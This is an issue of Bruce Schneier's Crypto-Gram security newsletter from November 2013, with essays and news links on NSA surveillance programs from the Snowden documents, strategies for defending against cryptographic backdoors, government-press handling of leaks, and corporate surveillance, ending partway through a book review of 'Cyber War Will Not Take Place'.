Crypto-Gram

November 15, 2013

by Bruce Schneier
BT Security Futurologist
schneier@schneier.com
http://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit <http://www.schneier.com/crypto-gram.html>.

You can read this issue on the web at <http://www.schneier.com/crypto-gram-1311.html>. These same essays and news items appear in the “Schneier on Security” blog at <http://www.schneier.com/>, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:


NSA Harvesting Contact Lists

A new Snowden document shows that the NSA is harvesting contact lists—e-mail address books, IM buddy lists, etc.—from Google, Yahoo, Microsoft, Facebook, and others.

Unlike PRISM, this unnamed program collects the data from the Internet . This is similar to how the NSA identifies Tor users. They get direct access to the Internet backbone, either through secret agreements with companies like AT&T, or surreptitiously, by doing things like tapping undersea cables. Once they have the data, they have powerful packet inspectors—code names include TUMULT, TURBULENCE, and TURMOIL—that run a bunch of different identification and copying systems. One of them, code name unknown, searches for these contact lists and copies them. Google, Yahoo, Microsoft, etc., have no idea that this is happening, nor have they consented to their data being harvested in this way.

These contact lists provide the NSA with the same sort of broad surveillance that the Verizon (and others) phone-record “metadata” collection programs provide: information about who are our friends, lovers, confidants, associates. This is incredibly intimate information, all collected without any warrant or due process. Metadata equals surveillance; always remember that.

The quantities are interesting:

During a single day last year, the NSA’s Special Source Operations branch collected 444,743 e-mail address books from Yahoo, 105,068 from Hotmail, 82,857 from Facebook, 33,697 from Gmail and 22,881 from unspecified other providers….

Note that Gmail, which uses SSL by default, provides the NSA with much less data than Yahoo, which doesn’t, despite the fact that Gmail has many more users than Yahoo does. (It’s actually kind of amazing how small that Gmail number is.) This implies that, despite BULLRUN, encryption works. Ubiquitous use of SSL can foil NSA eavesdropping. This is the same lesson we learned from the NSA’s attempts to break Tor: encryption works.

In response to this story, Yahoo has finally decided to enable SSL by default: by January 2014.

The “New York Times” makes this observation:

Spokesmen for the eavesdropping organizations reassured The Post that we shouldn’t bother our heads with all of this. They have “checks and balances built into our tools,” said one intelligence official.

Since the Snowden leaks began, the administration has adopted an interesting definition of that term. It used to be that “checks and balances” referred to one branch of the government checking and balancing the other branches—like the Supreme Court deciding whether laws are constitutional.

Now the N.S.A., the C.I.A. and the White House use the term to refer to a secret organization reviewing the actions it has taken and deciding in secret by itself whether they were legal and constitutional.

One more amusing bit: the NSA has a spam problem.

Spam has proven to be a significant problem for the NSA—clogging databases with information that holds no foreign intelligence value. The majority of all e-mails, one NSA document says, “are SPAM from ‘fake addresses and never ‘delivered’ to targets.”

http://www.washingtonpost.com/world/…

PRISM:
http://www.theguardian.com/world/2013/jun/06/…

The NSA at Tor:
https://www.schneier.com/essay-455.html
https://www.schneier.com/essay-454.html

How the NSA gets access:
http://www.washingtonpost.com/business/technology/…
http://www.theguardian.com/business/2013/aug/02/…
http://online.wsj.com/article/…
http://www.guardian.co.uk/uk/2013/jun/21/…
http://www.theatlantic.com/international/archive/…
http://www.theguardian.com/world/2013/jun/06/…

Metadata equals surveillance:
https://www.schneier.com/blog/archives/2013/09/…

BULLRUN:
http://www.theguardian.com/world/2013/sep/05/…
http://www.nytimes.com/2013/09/06/us/…

Yahoo switching to SSL by default:
http://www.theverge.com/2013/10/14/4838878/…
http://www.theregister.co.uk/2013/10/15/…
http://www.washingtonpost.com/s/the-switch/wp/…
https://twitter.com/ashk4n/status/389892774637891584

NSA source documents for the story:
http://apps.washingtonpost.com/g/page/world/…
http://apps.washingtonpost.com/g/page/world/…
http://apps.washingtonpost.com/g/page/world/…

“New York Times” story:
http://takingnote.blogs.nytimes.com/2013/10/15/…


NSA Eavesdropping on Google and Yahoo Networks

The “Washington Post” reported that the NSA is eavesdropping on the Google and Yahoo private networks—the code name for the program is MUSCULAR. I may write more about this later, but I have some initial comments:

* It’s a measure of how far off the rails the NSA has gone that it’s taking its Cold War-era eavesdropping tactics—surreptitiously eavesdropping on foreign networks—and applying them to US corporations. It’s skirting US law by targeting the portion of these corporate networks outside the US. It’s the same sort of legal argument the NSA used to justify collecting address books and buddy lists worldwide.

* Although the “Washington Post” article specifically talks about Google and Yahoo, you have to assume that all the other major—and many of the minor—cloud services are compromised this same way. That means Microsoft, Apple, Facebook, Twitter, MySpace, Badoo, Dropbox, and on and on and on.

* It is well worth re-reading all the government denials about bulk collection and direct access after PRISM was exposed. It seems that it’s impossible to get the truth out of the NSA. Its carefully worded denials always seem to hide what’s really going on.

* In light of this, PRISM is really just insurance: a way for the NSA to get legal cover for information it already has. My guess is that the NSA collects the vast majority of its data surreptitiously, using programs such as these. Then, when it has to share the information with the FBI or other organizations, it gets it again through a more public program like PRISM.

* What this really shows is how robust the surveillance state is, and how hard it will be to craft laws reining in the NSA. All the bills being discussed so far only address portions of the problem: specific programs or specific legal justifications. But the NSA’s surveillance infrastructure is much more robust than that. It has many ways into our data, and all sorts of tricks to get around the law. Note this quote:

John Schindler, a former NSA chief analyst and frequent defender who teaches at the Naval War College, said it is obvious why the agency would prefer to avoid restrictions where it can.

“Look, NSA has platoons of lawyers, and their entire job is figuring out how to stay within the law and maximize collection by exploiting every loophole,” he said. “It’s fair to say the rules are less restrictive under Executive Order 12333 than they are under FISA,” the Foreign Intelligence Surveillance Act.

No surprise, really. But it illustrates how difficult meaningful reform will be. I wrote this in September:

It’s time to start cleaning up this mess. We need a special prosecutor, one not tied to the military, the corporations complicit in these programs, or the current political leadership, whether Democrat or Republican. This prosecutor needs free rein to go through the NSA’s files and discover the full extent of what the agency is doing, as well as enough technical staff who have the capability to understand it. He needs the power to subpoena government officials and take their sworn testimony. He needs the ability to bring criminal indictments where appropriate. And, of course, he needs the requisite security clearance to see it all.

We also need something like South Africa’s Truth and Reconciliation Commission, where both government and corporate employees can come forward and tell their stories about NSA eavesdropping without fear of reprisal.

Without this, crafting reform legislation will be impossible.

* We don’t actually know if the NSA did this surreptitiously, or if it had assistance from another US corporation. Level 3 Communications provides the data links to Google, and its statement was sufficiently non-informative as to be suspicious:

In a statement, Level 3 said: “We comply with the laws in each country where we operate. In general, governments that seek assistance in law enforcement or security investigations prohibit disclosure of the assistance provided.”

On the other hand, Level 3 Communications already cooperates with the NSA, and has the codename of LITTLE:

The document identified for the first time which telecoms companies are working with GCHQ’s “special source” team. It gives top secret codenames for each firm, with BT (“Remedy”), Verizon Business (“Dacron”), and Vodafone Cable (“Gerontic”). The other firms include Global Crossing (“Pinnage”), Level 3 (“Little”), Viatel (“Vitreous”) and Interoute (“Streetcar”).

Again, those code names should properly be in all caps.

When I write that the NSA has destroyed the fabric of trust on the Internet, this is the kind of thing I mean. Google can no longer trust its bandwidth providers not to betray the company.

* The NSA’s denial is pretty lame. It feels as if it’s hardly trying anymore.

* Finally, we need more encryption on the Internet. We have made surveillance too cheap, not just for the NSA but for all nation-state adversaries. We need to make it expensive again.

http://www.washingtonpost.com/world/…
http://apps.washingtonpost.com/g/page/world/…

PRISM:
http://www.washingtonpost.com/investigations/…

My September quote:
https://www.schneier.com/essay-447.html

Level-3 statement:
http://www.nytimes.com/2013/10/31/technology/…

The NSA’s betrayal of the Internet
https://www.schneier.com/blog/archives/2013/09/…

The NSA’s denial:
http://s.wsj.com/digits/2013/10/30/…
http://www.emptywheel.net/2013/10/30/…

Level-3’s NSA code name:
http://www.theguardian.com/uk/2013/jun/21/…


Code Names for NSA Exploit Tools

This is from a Snowden document released by “Le Monde”:

General Term Descriptions:

HIGHLANDS: Collection from Implants VAGRANT: Collection of Computer Screens MAGNETIC: Sensor Collection of Magnetic Emanations MINERALIZE: Collection from LAN Implant OCEAN: Optical Collection System for Raster-Based Computer

Screens

LIFESAFER: Imaging of the Hard Drive GENIE: Multi-stage operation: jumping the airgap etc. BLACKHEART: Collection from an FBI Implant […] DROPMIRE: Passive collection of emanations using antenna CUSTOMS: Customs opportunities (not LIFESAVER) DROPMIRE: Laser printer collection, purely proximal access

(***NOT*** implanted)

DEWSWEEPER: USB (Universal Serial Bus) hardware host tap that

provides COVERT link over US link into a target network.
Operates w/RF relay subsystem to provide wireless Bridge into
target network.

RADON: Bi-directional host tap that can inject Ethernet packets

onto the same targets. Allows bi-directional exploitation of
denied networks using standard on-net tools.

There’s a lot to think about in this list. RADON and DEWSWEEPER seem particularly interesting.

https://www.documentcloud.org/documents/…


Defending Against Crypto Backdoors

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. It was the key used to encrypt the phone conversation, itself encrypted in a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it’s pretty much impossible to guarantee that a complex piece of software isn’t leaking secret information. We know from Ken Thompson’s famous talk on “trusting trust” (first delivered in the ACM Turing Award Lectures) that you can never be totally sure if there’s a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don’t know. Microsoft’s _NSAKEY looks like a smoking gun, but honestly, we don’t know.

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker—from the lowliest script kiddie up to the NSA—spies on our computers, it’s too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

* Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn’t affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector).

* High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a “mistyped” constant. Or “accidentally” reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don’t believe the DUAL_EC_DRBG backdoor is real: they’re both too obvious.

* Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That’s why the recently described potential vulnerability in Intel’s random number generator worries me so much; one person could make this change during mask generation, and no one else would know.

These characteristics imply several things:

* A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.

* If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.

* A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA’s requests.

* Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don’t really understand security.

* Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information—recall the LEAF—and modifying random nonces or header information is the easiest way to do that.

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I’m sure there’s more; this list isn’t meant to be exhaustive, nor the final word on the topic. It’s simply a starting place for discussion. But it won’t work unless customers start demanding software with this sort of transparency.

* Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It’s true we won’t know for sure if the code we’re seeing is the code that’s actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.

* The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.

* There should be no master secrets. These are just too vulnerable.

* All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.

* Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key or public predictable counters if possible. Again, the goal is to make it harder to subtly leak key bits in this information.

This is a hard problem. We don’t have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater “attack surface” for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it’s supposed to do and nothing more. Unfortunately, we’re terrible at this. Even worse, there’s not a lot of practical research in this area—and it’s hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn’t just about the NSA, and legal controls won’t protect against those who don’t follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.
http://www.wired.com/opinion/2013/10/…

The NSA’s secret agreements:
https://www.schneier.com/blog/archives/2013/09/…

Clipper Chip:
http://www.nytimes.com/1994/06/12/magazine/…

How the NSA get around encryption:
http://www.nytimes.com/2013/09/06/us/…
http://mashable.com/2013/09/11/…
http://news.cnet.com/8301-13578_3-57595202-38/…
http://www.wired.com/threatlevel/2013/10/…
http://www.nytimes.com/2013/10/03/us/…

BULLRUN:
http://www.theguardian.com/world/2013/sep/05/…

Subliminal channels:
https://en.wikipedia.org/wiki/Subliminal_channel

Kleptography:
https://en.wikipedia.org/wiki/Kleptography

Trusting trust:
http://cm.bell-labs.com/who/ken/trust.html

Debian bug:
https://freedom-to-tinker.com//kroll/…

Linux backdoor:
https://freedom-to-tinker.com//felten/…

DUAL_EC_DRBG:
http://www.wired.com/threatlevel/2013/09/…

SSL 2.0 flaw:
http://www.cs.berkeley.edu/~daw/papers/…

GSM A5/1 flaw:
http://www.cs.technion.ac.il/users/wwwb/cgi-bin/…

Common RSA moduli:
http://eprint.iacr.org/2012/064.pdf

_NSAKEY:
http://en.wikipedia.org/wiki/NSAKEY

NSA attacks Tor:
http://www.theguardian.com/world/2013/oct/04/…

Possible Intel RNG backdoor:
https://www.schneier.com/blog/archives/2013/09/…

Nonces:
http://en.wikipedia.org/wiki/Cryptographic_nonce

Assurance:
https://www.schneier.com/blog/archives/2007/08/…

I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the comments below. Please explain why you think the vulnerability could be intentional. Thank you.


Why the Government Should Help Leakers

In the Information Age, it’s easier than ever to steal and publish data. Corporations and governments have to adjust to their secrets being exposed, regularly.

When massive amounts of government documents are leaked, journalists sift through them to determine which pieces of information are newsworthy, and confer with government agencies over what needs to be redacted.

Managing this reality is going to require that governments actively engage with members of the press who receive leaked secrets, helping them secure those secrets—even while being unable to prevent them from publishing. It might seem abhorrent to help those who are seeking to bring your secrets to light, but it’s the best way to ensure that the things that truly need to be secret remain secret, even as everything else becomes public.

The WikiLeaks cables serve as an excellent example of how a government should not deal with massive leaks of classified information.

WikiLeaks has said it asked US authorities for help in determining what should be redacted before publication of documents, although some government officials have challenged that statement. WikiLeaks’ media partners did redact many documents, but eventually all 250,000 unredacted cables were released to the world as a result of a mistake.

The damage was nowhere near as serious as government officials initially claimed, but it had been avoidable.

Fast-forward to today, and we have an even bigger trove of classified documents. What Edward Snowden took—”exfiltrated” is the National Security Agency term—dwarfs the State Department cables, and contains considerably more important secrets. But again, the US government is doing nothing to prevent a massive data dump.

The government engages with the press on individual stories. The “Guardian,” the “Washington Post,” and the “New York Times” are all redacting the original Snowden documents based on discussions with the government. This isn’t new. The US press regularly consults with the government before publishing something that might be damaging. In 2006, the “New York Times” consulted with both the NSA and the Bush administration before publishing Mark Klein’s whistleblowing about the NSA’s eavesdropping on AT&T trunk circuits. In all these cases, the goal is to minimize actual harm to US security while ensuring the press can still report stories in the public interest, even if the government doesn’t want it to.

In today’s world of reduced secrecy, whistleblowing as civil disobedience, and massive document exfiltrations, negotiations over individual stories aren’t enough. The government needs to develop a protocol to actively help news organizations expose their secrets safely and responsibly.

Here’s what should have happened as soon as Snowden’s whistleblowing became public. The government should have told the reporters and publications with the classified documents something like this: “OK, you have them. We know that we can’t undo the leak. But please let us help. Let us help you secure the documents as you write your stories, and securely dispose of the documents when you’re done.”

The people who have access to the Snowden documents say they don’t want them to be made public in their raw form or to get in the hands of rival governments. But accidents happen, and reporters are not trained in military secrecy practices.

Copies of some of the Snowden documents are being circulated to journalists and others. With each copy, each person, each day, there’s a greater chance that, once again, someone will make a mistake and some—or all—of the raw documents will appear on the Internet. A formal system of working with whistleblowers could prevent that.

I’m sure the suggestion sounds odious to a government that is actively engaging in a war on whistleblowers, and that views Snowden as a criminal and the reporters writing these stories as “helping the terrorists.” But it makes sense. Harvard law professor Jonathan Zittrain compares this to plea bargaining.

The police regularly negotiate lenient sentences or probation for confessed criminals in order to convict more important criminals. They make deals with all sorts of unsavory people, giving them benefits they don’t deserve, because the result is a greater good.

In the Snowden case, an agreement would safeguard the most important of NSA’s secrets from other nations’ intelligence agencies. It would help ensure that the truly secret information not be exposed. It would protect US interests.

Why would reporters agree to this? Two reasons. One, they actually do want these documents secured while they look for stories to publish. And two, it would be a public demonstration of that desire.

Why wouldn’t the government just collect all the documents under the pretense of securing them and then delete them? For the same reason they don’t renege on plea bargains: No one would trust them next time. And, of course, because smart reporters will probably keep encrypted backups under their own control.

We’re nowhere near the point where this system could be put into practice, but it’s worth thinking about how it could work. The government would need to establish a semi-independent group, called, say, a Leak Management unit, which could act as an intermediary. Since it would be isolated from the agencies that were the source of the leak, its officials would be less vested and—this is important—less angry over the leak. Over time, it would build a reputation, develop protocols that reporters could rely on. Leaks will be more common in the future, but they’ll still be rare. Expecting each agency to develop expertise in this process is unrealistic.

If there were sufficient trust between the press and the government, this could work. And everyone would benefit.

This essay previously appeared on CNN.com.
http://edition.cnn.com/2013/11/04/opinion/…

WikiLeaks story:
http://thelede.blogs.nytimes.com/2011/09/01/…
http://www.salon.com/2011/09/02/wikileaks_28/
http://www.reuters.com/article/2013/07/31/…
http://www.cbsnews.com/2100-201_162-6962209.html
http://www.nytimes.com/2011/01/30/magazine/…

Mark Klein story:
http://www.nytimes.com/2006/04/13/us/…

The world of reduced secrecy:
https://www.schneier.com/essay-449.html

Whistleblowing as civil disobedience:
http://www.zephoria.org/thoughts/archives/2013/07/…

Software to facilitate massive document exfiltrations:
https://www.schneier.com/blog/archives/2013/10/…


NSA/Snowden News

Jack Goldsmith argues that we need the NSA to surveil the Internet not for terrorism reasons, but for cyberespionage and cybercrime reasons.
http://www.newrepublic.com/node/115002/

Daniel Gallington argues—the headline has nothing to do with the content—that the balance between surveillance and privacy is about right.
http://mobile.usnews.com/opinion/s/world-report/…

Good summary from the “London Review of Books” on what the NSA can and cannot do.
http://www.lrb.co.uk/v35/n20/daniel-soar/…

“A Template for Reporting Government Surveillance News Stories.” This is from 2006, but it’s even more true today.
http://www.concurringopinions.com/archives/2006/06/…
We’ve changed administrations—we’ve changed political parties—but nothing has changed.

There’s a story that Edward Snowden successfully socially engineered other NSA employees into giving him their passwords.
http://mobile.reuters.com/article/…

This talk by Dan Geer explains the NSA mindset of “collect everything”:
https://www.schneier.com/blog/archives/2013/11/…
The whole essay is well worth reading.
http://geer.tinho.net/geer.uncc.9×13.txt

This “New York Times” story on the NSA is very good, and contains lots of little tidbits of new information gleaned from the Snowden documents. “The agency’s Dishfire database—nothing happens without a code word at the N.S.A.—stores years of text messages from around the world, just in case. Its Tracfin collection accumulates gigabytes of credit card purchases. The fellow pretending to send a text message at an Internet cafe in Jordan may be using an N.S.A. technique code-named Polarbreeze to tap into nearby computers. The Russian businessman who is socially active on the web might just become food for Snacks, the acronym-mad agency’s Social Network Analysis Collaboration Knowledge Services, which figures out the personnel hierarchies of organizations from texts.
http://www.nytimes.com/2013/11/03/world/…
This “Guardian” story is related. It looks like both the “New York Times” and the “Guardian” wrote separate stories about the same source material.
http://www.theguardian.com/world/2013/nov/02/…
“New York Times” reporter Scott Shane gave a 20-minute interview on “Democracy Now” on the NSA and his reporting.
http://www.democracynow.org/2013/11/4/…

“Der Spiegel” is reporting that the GCHQ used QUANTUMINSERT to direct users to fake LinkedIn and Slashdot pages run by—this code name is not in the article—FOXACID servers. There’s not a lot technically new in the article, but we do get some information about popularity and jargon.
http://www.spiegel.de/international/world/…
Slashdot has reacted to the story.
https://slashdot.org/topic/bi/…
I wrote about QUANTUMINSERT, and the whole infection process, here.
https://www.schneier.com/essay-455.html


The Trajectories of Government and Corporate Surveillance

Historically, surveillance was difficult and expensive.

Over the decades, as technology advanced, surveillance became easier and easier. Today, we find ourselves in a world of ubiquitous surveillance, where everything is collected, saved, searched, correlated and analyzed.

But while technology allowed for an increase in both corporate and government surveillance, the private and public sectors took very different paths to get there. The former always collected information about everyone, but over time, collected more and more of it, while the latter always collected maximal information, but over time, collected it on more and more people.

Corporate surveillance has been on a path from minimal to maximal information. Corporations always collected information on everyone they could, but in the past they didn’t collect very much of it and only held it as long as necessary. When surveillance information was expensive to collect and store, companies made do with as little as possible.

Telephone companies collected long-distance calling information because they needed it for billing purposes. Credit cards collected only the information about their customers’ transactions that they needed for billing. Stores hardly ever collected information about their customers, maybe some personal preferences, or name-and-address for advertising purposes. Even Google, back in the beginning, collected far less information about its users than it does today.

As technology improved, corporations were able to collect more. As the cost of data storage became cheaper, they were able to save more data and for a longer time. And as big data analysis tools became more powerful, it became profitable to save more. Today, almost everything is being saved by someone—probably forever.

Examples are everywhere. Internet companies like Google, Facebook, Amazon and Apple collect everything we do online at their sites. Third-party cookies allow those companies, and others, to collect data on us wherever we are on the Internet. Store affinity cards allow merchants to track our purchases. CCTV and aerial surveillance combined with automatic face recognition allow companies to track our movements; so does your cell phone. The Internet will facilitate even more surveillance, by more corporations for more purposes.

On the government side, surveillance has been on a path from individually targeted to broadly collected. When surveillance was manual and expensive, it could only be justified in extreme cases. The warrant process limited police surveillance, and resource restraints and the risk of discovery limited national intelligence surveillance. Specific individuals were targeted for surveillance, and maximal information was collected on them alone.

As technology improved, the government was able to implement ever-broadening surveillance. The National Security Agency could surveil groups—the Soviet government, the Chinese diplomatic corps, etc.—not just individuals. Eventually, they could spy on entire communications trunks.

Now, instead of watching one person, the NSA can monitor “three hops” away from that person—an ever widening network of people not directly connected to the person under surveillance. Using sophisticated tools, the NSA can surveil broad swaths of the Internet and phone network.

Governments have always used their authority to piggyback on corporate surveillance. Why should they go through the trouble of developing their own surveillance programs when they could just ask corporations for the data? For example we just learned that the NSA collects e-mail, IM and social networking contact lists for millions of Internet users worldwide.

But as corporations started collecting more information on populations, governments started demanding that data. Through National Security Letters, the FBI can surveil huge groups of people without obtaining a warrant. Through secret agreements, the NSA can monitor the entire Internet and telephone networks.

This is a huge part of the public-private surveillance partnership.

The result of all this is we’re now living in a world where both corporations and governments have us all under pretty much constant surveillance.

Data is a byproduct of the information society. Every interaction we have with a computer creates a transaction record, and we interact with computers hundreds of times a day. Even if we don’t use a computer—buying something in person with cash, say—the merchant uses a computer, and the data flows into the same system. Everything we do leaves a data shadow, and that shadow is constantly under surveillance.

Data is also a byproduct of information society socialization, whether it be e-mail, instant messages or conversations on Facebook. Conversations that used to be ephemeral are now recorded, and we are all leaving digital footprints wherever we go.

Moore’s law has made computing cheaper. All of us have made computing ubiquitous. And because computing produces data, and that data equals surveillance, we have created a world of ubiquitous surveillance.

Now we need to figure out what to do about it. This is more than reining in the NSA or fining a corporation for the occasional data abuse. We need to decide whether our data is a shared societal resource, a part of us that is inherently ours by right, or a private good to be bought and sold.

Writing in the “Guardian,” Chris Huhn said that “information is power, and the necessary corollary is that privacy is freedom.” How this interplay between power and freedom play out in the information age is still to be determined.

This essay previously appeared on CNN.com.
http://www.cnn.com/2013/10/16/opinion/…

https://www.schneier.com/blog/archives/2013/10/…

Ubiquitous surveillance:
http://www.cnn.com/2013/03/16/opinion/…

Three hop analysis:
http://www.theatlanticwire.com/politics/2013/07/…
http://arstechnica.com/information-technology/2013/…

The public-private surveillance partnership:
https://www.schneier.com/essay-436.html

Chris Huhn’s comment:
http://www.theguardian.com/commentisfree/2013/oct/…

Richard Stallman’s comments on the subject:
http://ieet.org/index.php/IEET/more/stallman20131020


A Fraying of the Public/Private Surveillance Partnership

The public/private surveillance partnership between the NSA and corporate data collectors is starting to fray. The reason is sunlight. The publicity resulting from the Snowden documents has made companies think twice before allowing the NSA access to their users’ and customers’ data.

Pre-Snowden, there was no downside to cooperating with the NSA. If the NSA asked you for copies of all your Internet traffic, or to put backdoors into your security software, you could assume that your cooperation would forever remain secret. To be fair, not every corporation cooperated willingly. Some fought in court. But it seems that a lot of them, telcos and backbone providers especially, were happy to give the NSA unfettered access to everything. Post-Snowden, this is changing. Now that many companies’ cooperation has become public, they’re facing a PR backlash from customers and users who are upset that their data is flowing to the NSA. And this is costing those companies business.

How much is unclear. In July, right after the PRISM revelations, the Cloud Security Alliance reported that US cloud companies could lose $35 billion over the next three years, mostly due to losses of foreign sales. Surely that number has increased as outrage over NSA spying continues to build in Europe and elsewhere. There is no similar report for software sales, although I have attended private meetings where several large US software companies complained about the loss of foreign sales. On the hardware side, IBM is losing business in China. The US telecom companies are also suffering: AT&T is losing business worldwide.

This is the new reality. The rules of secrecy are different, and companies have to assume that their responses to NSA data demands will become public. This means there is now a significant cost to cooperating, and a corresponding benefit to fighting.

Over the past few months, more companies have woken up to the fact that the NSA is basically treating them as adversaries, and are responding as such. In mid-October, it became public that the NSA was collecting e-mail address books and buddy lists from Internet users logging into different service providers. Yahoo, which didn’t encrypt those user connections by default, allowed the NSA to collect much more of its data than Google, which did. That same day, Yahoo announced that it would implement SSL encryption by default for all of its users. Two weeks later, when it became public that the NSA was collecting data on Google users by eavesdropping on the company’s trunk connections between its data centers, Google announced that it would encrypt those connections.

We recently learned that Yahoo fought a government order to turn over data. Lavabit fought its order as well. Apple is now tweaking the government. And we think better of those companies because of it.

Now Lavabit, which closed down its e-mail service rather than comply with the NSA’s request for the master keys that would compromise all of its customers, has teamed with Silent Circle to develop a secure e-mail standard that is resistant to these kinds of tactics.

The Snowden documents made it clear how much the NSA relies on corporations to eavesdrop on the Internet. The NSA didn’t build a massive Internet eavesdropping system from scratch. It noticed that the corporate world was already eavesdropping on every Internet user—surveillance is the business model of the Internet, after all—and simply got copies for itself.

Now, that secret ecosystem is breaking down. Supreme Court Justice Louis Brandeis wrote about transparency, saying “Sunlight is said to be the best of disinfectants.” In this case, it seems to be working.

These developments will only help security. Remember that while Edward Snowden has given us a window into the NSA’s activities, these sorts of tactics are probably also used by other intelligence services around the world. And today’s secret NSA programs become tomorrow’s PhD theses, and the next day’s criminal hacker tools. It’s impossible to build an Internet where the good guys can eavesdrop, and the bad guys cannot. We have a choice between an Internet that is vulnerable to all attackers, or an Internet that is safe from all attackers. And a safe and secure Internet is in everyone’s best interests, including the US’s.

This essay previously appeared on TheAtlantic.com.
http://www.theatlantic.com/technology/archive/2013/…

The public/private surveillance partnership:
https://www.schneier.com/blog/archives/2013/08/…

PRISM:
http://www.washingtonpost.com/investigations/…

Increased outrage outside the US:
http://www.usatoday.com/story/news/world/2013/10/28/…

Losses due to NSA spying:
http://www.washingtonpost.com/s/the-switch/wp/…
http://www.nakedcapitalism.com/2013/10/…
http://online.wsj.com/news/articles/…

New rules of secrecy:
https://www.schneier.com/essay-449.html

The NSA and tech companies as adversaries:
http://www.theguardian.com/commentisfree/2013/nov/…
http://www.nytimes.com/2013/11/01/technology/…
http://www.wired.com/opinion/2013/08/…
http://www.theguardian.com/world/2013/sep/09/…
http://news.cnet.com/8301-1009_3-57610342-83/…
http://news.yahoo.com/…
http://rt.com/news/…
https://www.techdirt.com/articles/20130924/…
http://boingboing.net/2013/11/05/…

Yahoo announce3s SSL by default:
http://www.washingtonpost.com/s/the-switch/wp/…

Lavabit:
https://www.schneier.com/blog/archives/2013/08/…

Silent Circle’s new e-mail system:
http://www.computerworld.com.au/article/530582/…

Brandeis quote:
http://www.law.louisville.edu/library/collections/…


Book Review: “Cyber War Will Not Take Place”

Cyber war is possibly the most dangerous buzzword of the Internet era. The fear-inducing rhetoric surrounding it is being used to justify major changes in the way the Internet is organized, governed, and constructed. And in “Cyber War Will Not Take Place,” Thomas Rid convincingly argues that cyber war is not a compelling threat. Rid is one of the leading cyber war skeptics in Europe, and although he doesn’t argue that war won’t extend into cyberspace, he says that cyberspace’s role in war is more limited than doomsayers want us to believe. His argument against cyber war is lucid and methodical. He divides “offensive and violent political acts” in cyberspace into: sabotage, espionage, and subversion. These categories are larger than cyberspace, of course, but Rid spends considerable time analyzing their strengths and limitations within cyberspace. The details are complicated, but his end conclusion is that many of these types of attacks cannot be defined as acts of war, and any future war won’t involve many of these types of attacks.

None of this is meant to imply that cyberspace is safe. Threats of all sorts fill cyberspace, but not threats of war. As such, the policies to defend against them are different. While hackers and criminal threats get all the headlines, more worrisome are the threats from governments seeking to consolidate their power. I have long argued that controlling the Internet has become critical for totalitarian states, and their four broad tools of surveillance, censorship, propaganda and use control have legitimate commercial applications, and are also employed by democracies.

